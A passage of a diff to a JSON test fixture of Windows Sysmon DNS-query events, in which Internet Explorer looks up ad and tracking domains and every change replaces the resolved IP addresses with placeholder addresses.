SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4998,7 +4998,7 @@ "ProcessId": "2736", "QueryName": "sync-tm.everesttech.net", "QueryStatus": "0", - "QueryResults": "type: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;", + "QueryResults": "type: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22" @@ -5029,7 +5029,7 @@ "event_data": { "QueryName": "idsync.rlcdn.com", "QueryStatus": "0", - "QueryResults": "::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.237", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5040,7 +5040,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5052,7 +5052,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5074,7 +5074,7 @@ "ProcessId": "2736", "QueryName": "cm.adform.net", "QueryStatus": "0", - "QueryResults": "type: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;" + "QueryResults": "type: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": "22", @@ -5091,7 +5091,7 @@ { "@timestamp": "2021-05-05T15:30:51.706Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:37.18.16.16;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5108,7 +5108,7 @@ "ProcessId": "2736", "QueryName": "dm.hybrid.ai", "QueryStatus": "0", - "QueryResults": "::ffff:37.18.16.16;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22", @@ -5139,7 +5139,7 @@ "ProcessId": "2736", "QueryName": "static.adsafeprotected.com", "QueryStatus": "0", - "QueryResults": "type: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -5166,7 +5166,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5178,7 +5178,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692920100Z'/\u003e\u003cEventRecordID\u003e150\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etrc.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5190,7 +5190,7 @@ "ProcessId": "2736", "QueryName": "trc.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;", + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -5220,7 +5220,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:107.178.254.65;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692935200Z'/\u003e\u003cEventRecordID\u003e151\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.379\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epippio.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5242,7 +5242,7 @@ "ProcessId": "2736", "QueryName": "pippio.com", "QueryStatus": "0", - "QueryResults": "::ffff:107.178.254.65;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "opcode": "Info", @@ -5262,7 +5262,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692997300Z'/\u003e\u003cEventRecordID\u003e152\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel-sync.sitescout.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-a.sitescout.com;::ffff:209.15.36.34;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 